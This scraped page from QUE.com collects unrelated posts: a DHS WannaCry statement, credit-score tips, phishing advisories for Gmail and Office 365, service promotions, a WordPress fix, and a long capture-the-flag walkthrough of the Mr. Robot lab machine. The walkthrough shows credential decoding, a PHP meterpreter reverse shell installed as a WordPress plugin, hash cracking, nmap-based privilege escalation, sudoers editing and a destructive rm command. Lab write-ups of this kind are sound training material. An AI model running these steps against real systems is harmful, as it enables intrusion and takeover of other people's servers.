DHS Statement on ongoing ransonware attackes - QUE.com

WASHINGTON – The Department of Homeland Security is aware of reports of ransomware known as WannaCry affecting multiple global entities.  Ransomware is a type of malicious software that infects a computer and restricts users’ access to it until a ransom is paid to unlock it.  Microsoft released a patch in March that addresses this specific vulnerability, and installing this patch will help secure your systems from the threat. Individual users are often the first line of defense against this and other threats, and we encourage all Americans to update your operating systems and implement vigorous cybersecurity practices at home, work, and school.
These practices include:
- Update your systems to include the latest patches and software updates.
- Do not click on or download unfamiliar links or files in emails.
- Back up your data to prevent possible loss, whether you are at a family computer or company data.
We are actively sharing information related to this event and stand ready to lend technical support and assistance as needed to our partners, both in the United States and internationally.  DHS has a cadre of cybersecurity professionals that can provide expertise and support to critical infrastructure entities.
DHS also leads the federal government’s efforts to protect civilian executive branch agency systems and networks. In partnership with each agency’s Chief Information Officer we are ensuring our own networks are protected against the threat.
For more information, DHS has previously released information on best practices to address ransomware. That information is available on our website at https://www.us-cert.gov/security-publications/Ransomware
Source: Department of Homeland Security
At QUE.com and partners, we have weekly and monthly schedule to check the security posture of our web servers and services. We also check our network of websites daily and apply updates if needed to keep it up, safe and secure.
And sometimes it is very inconvenient to apply extra layer of security because of added step, this is the reason why. We don't want to be one of the victims of any cyber attacks.
As of writing this email, the sad part is some 20+ already paid using bitcoins. They have no assurance that they will be able to get their data anyway and absolutely no refunds.
Keep in mind, when a hacker owned your computer. It is no longer yours.
If you spot a ransomware incident, take a picture of their bitcoins so we can track their activity.

Source: Que.com

How to improve your credit score

Keys to a Higher Credit Score
Credit scores provide a snapshot of your financial health. Your credit score can affect everything from credit card limits to loans to your ability to rent an apartment or buy a home. A high credit score can indicate to lenders that you are likely more credit worthy while a low credit score can suggest you may be a loan risk.
How to improve your score
There are a few things you can do to improve your credit score over time. Reducing your utilization percentage helps keep your credit score up. Always paying bills when they’re due, keeping a modest balance on your credit cards and paying more than the minimum due each month will help with your credit utilization.
Build your score for the future | There are 4 key things you should do to grow your credit score for long term credit health.
1. Pay your bills on time
Paying your bills on time accounts for 35 percent of your credit score. Stay on top of your bills by creating a calendar for tracking when your bills are due. You can also enroll in auto bill payments with online banking tools to avoid paying bills late.
2. Don’t max out your credit
Keeping your account balances low can help raise your credit scores. Your credit utilization ratio is a major factor when determining your score. You can estimate this ratio for each of your accounts by dividing the amount you owe on each account by the amount of the credit line.
3. Keep track of length of credit history
The length of your credit history accounts for 15 percent of your scores. You should open and maintain one or two major credit cards. Don’t close accounts, particularly those that you’ve had for a longer time. Maintaining accounts in good standing for an extended period of time is an indicator that you’re responsible with your credit.
4. Manage new credit and types of credit
10 percent of your FICO score is based on new credit. Opening multiple accounts within a short time can signal financial problems. A mix of credit types, new and old, is preferable to having only one type of credit. Credit cards, education loans, vehicle loans and home loans are examples of types of credit.
Thank you LendingTree for sharing this credit tips.

Gmail Phishing Attack

Another day of Email Phishing Attack, this one for Gmail user’s account as the target. Last Tuesday May 3, an email phishing attack that was designed to trick users into giving up access to their Gmail accounts started showing up on target email inbox. The 1st captured image below is an example of Gmail Phishing attack email. When a user click on the “Open in Docs” link, the hacker will exploit the Gmail user’s account.
20170503.Gmail.PhishingAttack1
But it did not stop there, this phishing attack also behave as a “worm” that also sent itself out to all the affected user’s contacts. The 2nd captured image is an example of email coming from @gsa.gov infected user’s contact. You might receive a similar email coming from different email addresses.
20170503.Gmail.PhishingAttack
Please note the recipient email address “hhhhhhhhhhh@mailnator.com, I hope this is enough reason not to open or read this message, delete it right away. If you clicked on the link and enter your Gmail credentials please continue to read on how to perform Google security check-up.
Here’s how to check your Gmail account.
  • Open a new browser. I highly recommend using a modern browser e.g. Edge, Google Chrome or Firefox because they are equipped with safe browser features to protect and block malicious site or links.
  • Login to your Gmail account. Check your Gmail account connected Apps here (https://myaccount.google.com/u/1/permissions?pli=1). Review and cancel any connection if you don’t need it or don’t know it.
  • Go to Google Security Check-up (https://myaccount.google.com/secureaccount) to check your account.
I hope that help. Have a Safe surfing.
Source: QUE.com

Hard VS Soft credit pulls

I’m looking for a Mortgage Lending company to loan me money so I can purchase a small house. So, I checked LendingTree.com to give me some ideas. And one day, I received this email I guess one of their Newsletter regarding Credit Tips. “Some vital info about your credit score” and I think it is very useful to new home buyers like me.
Soft pulls happen when you:
  • Check your own score – you can do this often! It doesn’t affect your score!
  • Get free loan offers
  • Receive a loan pre-qualification
  • Experience an employer background check
  • Receive pre-approved credit card offers in the mail
  • Get your LendingTree credit scores
Won’t – adversely affect your credit score
Hard pulls happen when you apply for a:
  • New credit card
  • Home mortgage
  • Auto Loan
  • Refinance of your home mortgage
  • Home equity line of credit
  • Store credit card
  • Checking or savings account
Can – lower your credit score by quite a few points
What hurts your credit score the most. Multiple hard pulls over a long period
Limit your hard pull credit inquiries. While hard inquiries are necessary to receive credit, it is important to understand how it works. All inquiries on your credit report within a 14-day period will count as one inquiry ONLY IF you’re shopping for one of the following items – a home mortgage, home refinance, home equity loan or auto loan. Be mindful if you are tempted to open more than one credit account like a home mortgage and an auto loan or a home mortgage and a new credit card in that same period. It will count as a separate inquiry and could impact your score.
Who Tracks this Info? The most important credit bureaus do. Don’t let your score go down! Avoid getting too many hard pulls at once.
  • fairIsaac
  • MyFico
  • TransUnion
  • Experian
  • Equifax


Decluttering Your Digital Life by QUE.com

I received this Friends Newsletter today from Department of Homeland Security and I think it is a very useful information to share. So here you go and I hope you find it useful as well.
Start fresh this spring – online and offline. In addition to the traditional tasks on your spring cleaning list like tidying the closet and washing the windows, take time to create a “digital spring cleaning” list as well.
What exactly does a “digital spring cleaning” entail?
A digital spring cleaning means taking control of your digital life and the information that you share online. Similar to regular cleaning or tidying one’s home, it might seem like a daunting task at first. In reality, just a few simple steps can make a big difference in helping protect yourself online.
The Department of Homeland Security recommends that you incorporate these cyber tips into your spring cleaning routine this year.
  • Clean your machine. Update the security software on all of your devices that connect to the Internet.  Keeping the software on your devices up to date will prevent attackers from taking advantage of known vulnerabilities. Also review the applications you have downloaded. If you no longer use a particular app, delete it. It’ll not only free up storage space on your device, but it will also remove permissions that app has to potentially gather your information. 
  • Turn on multi-factor authentication. Enable stronger authentication on your online banking and email accounts. Turning on a two-factor authentication, such as a PIN sent to your mobile device, helps verify a user has authorized access to an account. For more information about authentication, visit the Lock Down Your Login Campaign at www.lockdownyourlogin.com.
  • Tidy your online reputation. Review your social media accounts and delete old photos or posts that may no longer represent who you are. As you go through your online posts, think about how they might influence others’ opinions of you. Also take the time to review the privacy settings on your online accounts. Take advantage of the privacy settings offered by major online apps and websites by limiting the amount of people who can see the information you share.
Visit and download the National Cyber Security Alliance’s “Digital Spring Cleaning Checklist” for more steps to clean up your online life.
For more tips on how to stay safe online, please visit the Department of Homeland Security’s Stop.Think.Connect. Campaign at www.dhs.gov/stopthinkconnect.

Source: Que.com

Professions Most Vulnerable to Cyber Hacks

Whenever you are in a profession that deals with highly confidential subject matter, you are going to be just as highly vulnerable to leaks and hacks. Sometimes, this is nefarious in nature as there are those out there who would like to be privy to the ‘secret’ details in someone else’s life and sometimes those leaks are just for the sheer fun of it by a sick mind. Anyone in the field of social work or mental health will be vulnerable to these kinds of attacks because of the very nature of what it is they do. They deal with the thoughts and emotions of other human beings who may have been victimized in the past. For this reason, the following professions should take extra precautions to guard any data entered or stored on their computers.
First – A Bit of Cyber Security Advice
Before talking about a few of the professions most vulnerable to cyber hacks, it might be wise to give a bit of advice on how to keep your computers as secure as possible. It is suggested that you password protect any devices you will be using in the field and make sure those passwords are of the highest levels. Multi-character long passwords are best so anyone gains access to your laptop or iPad, they will not be able to see any files you’ve saved locally.
Social Workers Are Prime Targets
Anyone employed in the field of social work will be privy to some of the most personal information their clients are willing to share. As a result, it is an ethical and legal obligation of the social worker to keep that information strictly confidential. What happens in the case of a county social worker, for example, who is already working in the field but pursuing a masters in social work online? He or she will undoubtedly be taking that ever-present laptop wherever they go and if there are any files on it that could damage the well being of a client, keeping it unsecured is a breach of professional conduct.
CPS Workers Who Deal with Abused Children
Although a branch of social work, a CPS worker may have obtained that M.S.W. online and, as a result, is now a field agent within the department. This type of social worker will typically be out investigating reports of child abuse and how better to document each visit than a mobile device that can take evidentiary photos and store text files of notes involving what that caseworker observed on the visit? Again, cyber security is an absolute must when working in the field.
Anyone can gain access to that device and what if it is an estranged spouse trying to learn where the mother and children are being kept in a safe facility? You never know who would want to find those abused children or battered women, so cyber security is essential. Any transmissions to your database from your mobile device may be hacked if you don’t have great security on deck. Whether working in the field or from the office, any profession that deals with the mental or emotional well-being of their clients will be a prime target for being hacked and are, indeed, ethically responsible for ensuring confidentiality. Stay secure with the latest software, protecting your clients and yourself at the very same time.
Image by Retune.com

Vault 7: CIA Hacking Tools Revealed | Wikileaks

If you're in Cyber Security business, you will be a lot busier for days to come securing your network and your customers. Wikileaks revealed CIA Hacking Tools.
Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.
The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virgina. It follows an introductory disclosure last month of CIA targeting French political parties and candidates in the lead up to the 2012 presidential election.
Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

KING of Tanks - MultiPlayer Games

Welcome to KING of Tanks Multiplayer Game – Que.com latest game. 
kingoftanks-com-01
This will be our reference project for future KING of Tanks multiplayer game improvement. We hope you enjoy playing games with us. Keep in mind this game is FREE you don't have to pay to play.
Things to remember, you can easily come back to this page by going to the following links for quick access. We want you bookmark this page :).
continue reading at KING of Tanks Multiplayer Game web page for more information.

KING.NET Email Address

Manage your business, not your E-mail. We provides reliable uptime, global scalability, and world class security powered by Google Apps. Doing business in the computing cloud means you’re always current – no more maintenance, upgrades, security patches or hassles. You can re-allocate your in-house IT to other productive projects.
Got your email @KING.NET? Please go to http://mail.king.net to login to your email address, password and your pin. For your email security, it is highly recommended that you enable the Two-Factor Authentication to access your email.
Your email is accessible using the following:
  • Any modern internet browser e.g. Internet Explorer (IE), Google Chrome, Mozilla Firefox, Safari and others.
  • Smart Phones e.g. iPhone, Android, etc.
Examples of Email Addresses to register: Please note email address @KING.NET is a premium identity for very important person like yourself. You can only get your own email @KING.NEt here. Some example of premium email address using @KING.NET
  • Saudi@King.net
  • Charles@King.net
  • Royal@King.net
  • James@King.net
  • Peter@King.net
  • and of course your own Name@KING.NET

Enable Two-Factor Authentication to protect your Email Account.

Retune.com - Email Security
Retune.com - Email Security
Your email address is the center of your security world. It is highly recommended that you enable Two-Factor Authentication to minimize risk of someone accessing your email through spear phishing attack, discover caches of passwords in your mailbox, and other related email attack. As an example, the attacker of DNC email uses a simple password reset request through spear phishing attack, was able to gain access to the email and password. If the Two-Factor Authentication is enabled, it will require another layer of security through verification code and stop it.



Two-Factor Authentication or 2-Step Verification adds an extra layer of security to your email account by requiring you to enter a verification code in addition to your username and password when signing into your email account. It help protect a user's account from unauthorized access should someone manage to obtain their password. Even if a password is cracked, guessed, or otherwise stolen, an attacker can't sign in without access to the user's additional verification. This verification can be in the form of codes which only the user can obtain via their own mobile phone.

Requirement. To use Two-Factor Authentication you need to have a mobile phone that can receive the verification code via text message or phone call. Other devices use the Google Authenticator mobile app to generate the verification code.

How to enable Two-Factor Authentication?
Retune.com - Cyber Security
Retune.com - Cyber Security
Using Gmail or white label domain name.
  • Login to your email, go to https://www.gmail.com, enter your email address and password.
  • Click your name icon (upper right corner), then click My Account
Google provided a detailed step-by-step procedure on how to enable it. You will see Security Checkup, click on Get Started and follow the steps.
  1. Check your recovery information.
  2. Check your connected devices
  3. Check your account permissions
  4. Check your app password. This is to create password for your MS Outlook or other email reader application.
  5. Check your Two-Factor settings

Have a safe computing experience.

Source: Que.com

FIXED. Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837

The latest version of WordPress is v4.7. It is always recommended to upgrade to the latest released to minimize vulnerabilities (exposure) and improve use of content management service.
Always backup before you upgrade, copy your WordPress files and download the database. This will give us way to roll-back just in case we run into "unknown" issue. It is not always perfect when you upgrade.
During my upgrade to v4.7 to one of my customer website. I've got this error.
Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837
A quick fix is to re-upload the plugin.php file from my old backup to the /wp-includes folder. This works!
But I want to use the latest plugin.php file not the old copy. Searching the internet trying to find out if anyone has encounter the same error when upgrading to the latest version of wordpress. No surprise! It is already been discussed, issue and alternative solutions to fix it.
I found the solution. I disabled this file "/wp-content/object-cache.php" by renaming it to object-cache.DISABLED.php or deleting will work as well. I don't know the use of this file at this point.
I re-uploaded the latest plugin.php to /wp-includes/ folder. Tested my website and happy with the result. 
I hope this help.
Source: Que.com

A new phishing attack targeting Office 365 business email users - EM @QUE.com

A new phishing attack targeting Office 365 business email users was found using Punycode to go undetected by both Microsoft’s default security and desktop email filters, Avanan security researchers warn.
The attack is meant to steal Office 365 credentials and abuses a vulnerability in how Office 365 anti-phishing and URL reputation security layers deal with Punycode. The attack starts with fake FedEX email that include benign looking URLs meant to take users to malicious website. See image below.
office-365-business-users-targeted-in-punycode-based-phishing
By using Punycode and leveraging said flaw in the phish-detection engine, the URL actually resolves to two different domains, one safe, which is detected by Office 365, and the other malicious, which is followed by the browser.
The underlining issue is that Office 365’s default security treats the domain as plain ASCII when verifying whether it is legitimate or not. Because all modern browsers support Unicode character, the address is translated to its Unicode format when launched in the browser. This address is malicious and presents users with a fake Office 365 login page in an attempt to steal user credentials.
How to protect against phishing email or spear phishing email intended for the big fish in our organization?
  • Do not click in any links asking you to reset your password. Make it as a habit, never click on a link from your email :)
  • Use Two-Factor Authentication. I highly recommend that you use Two-Factor authentication when available, for your bank accounts, social networks e.g. LinkedIn, Facebook, etc. (The Two-Factor authentication is not available to Kiosk Email user.)
The Phishing Email is the same old method used when a malicious person, asking you to change your bank account password, compromised bank accounts, deposited money on your bank, UPS delivery, social media accounts, free Redskins ticket, free Washington Wizards tickets, and many other variations of fake email. According to PhishMe91% of CyberAttacks start with a Phishing Email. The hacked incidents of high profile staff at DNC is through phishing emails. Using this method is cheap, hard to detect, and easy to deploy.
Security awareness of everyone is important to minimize our exposure.
What is the worst case scenario if you click on a “bait” links?
  • The malicious user will have access to your account. For example, your email, social media, banks account, etc.
  • Or The malicious user will have full control of your computer through “reverse shell” access. Where they can see all files, install a back-door program to get back in, use your webcam, use your computer as bot for DDOS attack, anything they want.
What to do if you accidentally click a “bait” links?
  • When you click on a “bait” link or a bad attachment, you think nothing happen and move on with your routine tasks. But the malicious code is already executed in the background, you will not notice it that’s how it is design. Don’t ignore this simple mistake, reboot your workstation right away, this will end the session initiated by clicking the bad link.
  • Scan your workstation using your anti-virus/anti-malware software.
  • Report to your immediate supervisor or post in our comment below. Our community is willing to help.
The Center for Development of Security Excellence (CDSE.edu) website provides a fun way to test your awareness against Phishing Scams. Go to http://www.cdse.edu/shorts/cybersecurity.html# website, check the Phishing Scams video “Phishing Scams Avoid the Bait” and have fun.
Reference links:

CTF – Hacking Mr. Robot by EM @QUE.com

Another learning experience to improve my penetration testing skills by hacking Mr. Robot virtual machine as my target machine.
My private network for this penetration testing exercise.
  • Kali Linux, my tool to exploit the target machine. IP Address 192.168.159.131
  • Mr.Robot, my target machine. IP Address: Unknown
que-com-mr-robotLet's begin. My objective is to find the three hidden keys.
Sponsored by Termed.com Life Insurance.
I have no knowledge of my target machine (Mr. Robot) IP Address, so let me begin running nmap tool. Of course, you can also use other network discovery tool to scan your network. I prefer nmap tool, it is available to my pentest machine.
root@kali:~# nmap -T4 192.168.159.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 10:41 EST
Nmap scan report for 192.168.159.131
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for 192.168.159.254
Host is up (0.00015s latency).
All 1000 scanned ports on 192.168.231.254 are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for 192.168.159.130
Host is up (0.0000050s latency).
All 1000 scanned ports on 192.168.159.131 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
root@kali:~#
I discovered my target machine IP address 192.168.159.130 and open ports. That's a basic enumeration, scanning my private network.
Port 80 and 443 are interesting ports to start poking around. Let's see what's on this website. I'm calling firefox program direct from the command prompt, of course you can simply click on the Firefox icon and enter the IP Address of the web server. It's cool to use CLI to run a command.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/
The website started loading a javascript, looks like loading a linux environment.
que-com-ctp-mr-robot-webpage
Opening the source code, got this fancy "Your are not alone".
que-com-ctp-mr-robot-webpage-javascript
Checking to see if I can use any of this information to hack Mr.Robot box.
Nothing so far. I will come back to this webpage later on.
Let's try using "dirbuster" to know our target website.
root@kali:~/KING.NET/mr.robot# dirb http://192.168.159.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 30 19:18:31 2016
URL_BASE: http://192.168.159.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.130/ ----
==> DIRECTORY: http://192.168.159.130/0/
==> DIRECTORY: http://192.168.159.130/admin/
+ http://192.168.159.130/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.159.130/audio/
==> DIRECTORY: http://192.168.159.130/blog/
==> DIRECTORY: http://192.168.159.130/css/
+ http://192.168.159.130/dashboard (CODE:302|SIZE:0)
+ http://192.168.159.130/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/feed/
==> DIRECTORY: http://192.168.159.130/image/
==> DIRECTORY: http://192.168.159.130/Image/
==> DIRECTORY: http://192.168.159.130/images/
+ http://192.168.159.130/index.html (CODE:200|SIZE:1077)
+ http://192.168.159.130/index.php (CODE:301|SIZE:0)
+ http://192.168.159.130/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.159.130/js/
http://192.168.159.130/license (CODE:200|SIZE:309)
http://192.168.159.130/login (CODE:302|SIZE:0)
+ http://192.168.159.130/page1 (CODE:301|SIZE:0)
+ http://192.168.159.130/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.159.130/rdf (CODE:301|SIZE:0)
+ http://192.168.159.130/readme (CODE:200|SIZE:64)
http://192.168.159.130/robots (CODE:200|SIZE:41)
http://192.168.159.130/robots.txt (CODE:200|SIZE:41)
+ http://192.168.159.130/rss (CODE:301|SIZE:0)
+ http://192.168.159.130/rss2 (CODE:301|SIZE:0)
+ http://192.168.159.130/sitemap (CODE:200|SIZE:0)
http://192.168.159.130/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/video/
==> DIRECTORY: http://192.168.159.130/wp-admin/
+ http://192.168.159.130/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-content/
+ http://192.168.159.130/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-includes/
+ http://192.168.159.130/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.159.130/wp-load (CODE:200|SIZE:0)
http://192.168.159.130/wp-login (CODE:200|SIZE:2627)
--- snip --- dirbuster still running.
I have to cancel it. I think I have enough information to start digging. There are so much information from this dir results. Getting to know of some sub-folders e.g. /admin, /blog, /license, /phyadmin, /wp-admin, /wp-login, /wp-config, etc. I think Mr.Robot box website is using a WordPress content management system. Nice.
Checking the following sub-folder.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license
A webpage with this content "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Sponsored by Termed.com Life Insurance.
Continue to scroll down 'till the end of the page to see this text "
do you want a password or something?" and this code.
ZWxsaW90OkVSMjgtMDY1Mgo=
Copied to nano and save as 1stdump.txt to check for base64. Run base64 -d -i 1stdump.txt
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
elliot:ER28-0652
root@kali:~/KING.NET/mr.robot#
Look like we have elliot:ER28-0652 username and maybe a password. Let's try to login to Mr.Robot virtual machine and if this account information work.
No luck! Continue hacking the box :(.
Let me try using this account here, http://192.168.159.130/wp-admin. It's a success!
que-com-ctp-mr-robot-wordpress
Checking the user, "elliot" username is also the Administrator. Jackpot! And another user micho05654 role as subcriber. I will ignore this subscriber user, and focus to elliot as administrator.
que-com-ctp-mr-robot-wordpress-admin
Now, I can control this box from here. Exploiting the WordPress CMS since I have an Administrator rights through a reverse shell. Let Kali virtual machine do the work for us. Click on Applications, Exploitation Tools, then click MSF Payload. It will open the MSFVenom Payload Creator in a new terminal window. I run the command below.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
This command interpret to run msfpc payload create using type php, the IP address e.g. 192.168.159.131 of the attacker using port 433, using msf for cross platform shell gaining full power of metasploit, reverse to make the target connect back to the attacker in a complete stand alone payload (stageless), using tcp standard method of connecting back. I hope that make sense to you, otherwise type --help for more details.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP: 192.168.159.131
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST=192.168.159.131 LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
And the command to run "msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'". All ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listening (attacker) machine ready and waiting for connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.159.131:443
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also provided a website that I can use to exploit my target e.g. python -m SimpleHTTPServer 8080. But in this scenario, I will not use it because I already have administrator access to the WordPress site. All I need to do is install my payload through WordPress as plugin. At this point, I can create havoc to the WordPress installation by deleting contents but the main goal is to own the box (pwn to root or pwn 2 r00t).
I will edit the php file with additional information so I can use it as WordPress plugin. Here's the updated php file.
/*
Plugin Name: Pwn-to-Root
Plugin URI: http://www.king.net
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI: http://www.king.net
*/
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
Then zip the php file.
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
root@kali:~#
The payload is now ready. I can use the zip file to upload as plugin in WordPress management console. Let's go back to the WordPress admin page. In Plugin, click add new plugin, then upload the zip file. Browse the zip file, click Install Now. Wait to complete the upload.
que-com-ctp-mr-robot-wordpress-activateplugin
I've already started the listening machine (above), so all I need to do is click Activate Plugin to create the reverse access. When I check my listening machine, I see our session.
[*] Meterpreter session 1 opened (192.168.159.131:443 -> 192.168.159.130:39959) at 2016-12-03 23:39:58 -0500
From the listening machine, type help to check all available commands.
msf exploit(handler) > help sessions
Type "sessions"
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter php/linux daemon (1) @ linux 192.168.159.131:443 -> 192.168.159.130:39959 (192.168.159.130)
msf exploit(handler) >
Type "help sessions" to see options on how to connect using sessions.
msf exploit(handler) > help sessions
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
Now, I can connect to session id 1 using -i option for Interact with supplied session ID
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We are now in session. From here I can use local commands using Mr.Robot machine  e.g. ls, pwd
meterpreter > pwd
---snip --
00644/rw-r--r-- 19642 fil 2015-09-16 06:49:06 -0400 user-new.php
100644/rw-r--r-- 16552 fil 2015-09-16 06:49:06 -0400 users.php
100644/rw-r--r-- 16143 fil 2015-09-16 06:49:06 -0400 widgets.php
meterpreter > pwd
/opt/bitnami/apps/wordpress/htdocs/wp-admin
meterpreter >
Let me check the home directory.
meterpreter > ls /home
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
I see robot directory, continue digging ...
meterpreter > ls
Listing: /home
==============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40755/rwxr-xr-x 4096 dir 2015-11-13 02:20:08 -0500 robot
meterpreter > cd robot
meterpreter > ls
Listing: /home/robot
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100400/r-------- 33 fil 2015-11-13 02:28:21 -0500 key-2-of-3.txt
100644/rw-r--r-- 39 fil 2015-11-13 02:28:21 -0500 password.raw-md5
meterpreter >
In /home/robot directory, two files found
  1. key-2-of-3.txt
  2. password.raw-md5
I can't access the "key-2-of-3.txt"  file because it is only available (r--------) owner, e.g. user "robot". See error below, but "password.raw-md5" is available (rw-r--r--)
meterpreter > cat key-2-of-3.txt
[-] core_channel_open: Operation failed: 1
meterpreter > cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
meterpreter >
The "robot:c3fcd3d76192e4007dfb496cca67e13b" stands for username:password. I've used online MD5 decryter tool (hashkiller.co.uk) to produce the value of "c3fcd3d76192e4007dfb496cca67e13b" to "abcdefghijklmnopqrstuvwxyz". Wow! the password is so basic. If I run a password cracker earlier, I'm sure I can get this password in under 2 minutes. Anyway, let me login to Mr.Robot box using this username (robot) and password (abcdefghijklmnopqrstuvwxyz).
que-com-ctp-mr-robot-boxaccess
Successfully login as robot and (abcdefghijklmnopqrstuvwxyz). Run ls command to check directory listing.
que-com-ctp-mr-robot-list
Run "cat key-2-of-3.txt" to view the file.
que-com-ctp-mr-robot-key2
Check if I can "ls /root"
que-com-ctp-mr-robot-list-root
Oops ... it seems more research for me to get the root access.
After long hours of research and reading other penetration testing website/blogs...
I checked Mr.Robot box nmap version.
que-com-ctp-mr-robot-nmap
I can use "nmap --interactive" using !bash to runs shell command.
que-com-ctp-mr-robot-nmap-bash
No luck.
Now, trying !sh to runs shell command. Type "exit" to get out of bash command.
que-com-ctp-mr-robot-nmap-sh-key3
It's a success using !sh command. Checking /root/firstboot_done it's empty, and /root/key-3-of-3.txt produce our key "04787ddef27c3dee1ee161b21670b4e4".
At this time. I discovered 2 out of 3 keys as listed below.
  1. key-1-of-3.txt - ?
  2. key-2-of-3.txt "822c73956184f694993bede3eb39f959"
  3. key-3-of-3.txt "04787ddef27c3dee1ee161b21670b4e4".
What's next after getting root access? I'm not done yet, my user "robot" still a standard account. I can escalate the privilege of user "robot" to "root" through editing sudoers file to add "robot ALL=(ALL) ALL". Type nano /etc/sudoers to add "robot ALL=(ALL) ALL".
que-com-ctp-mr-robot-nano-sudoers
Save it. Exit !sh command, quit nmap, run sudo ls, then enter the robot password. If everything goes well, I can run sudo su for super user.
que-com-ctp-mr-robot-rooted
Rooted!
Sponsored by Termed.com Life Insurance.
From here, I can do anything to Mr.Robot virtual machine. I can even delete this box by running a command "# rm -r --no-preserve-root".
I still need to find the value of key-1-of-3.txt. Going back to the website, check other sub-folders.
Checking the http://192.168.159.130/robots/ web page got nothing.
Checking the http://192.168.159.130/robots.txt file,  shows an interesting information e.g. fsocity.dic and key-1-of-3.txt. Let's download these files and investigate.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt
run wget http://192.168.159.130/fsocity.dic
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/fsocity.dic
--2016-12-03 15:13:04-- http://192.168.159.130/fsocity.dic
Connecting to 192.168.159.130:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7245381 (6.9M) [text/x-c]
Saving to: ‘fsocity.dic’
fsocity.dic 100%[=======================>] 6.91M 20.0MB/s in 0.3s
2016-12-03 15:13:06 (20.0 MB/s) - ‘fsocity.dic’ saved [7245381/7245381]
The fsocity.dic is 6.91M filesize, it could be a word list.
Let me download the text file too.
root@kali:~/KING.NET/mr.robot# wget http://192.168.159.130/key-1-of-3.txt
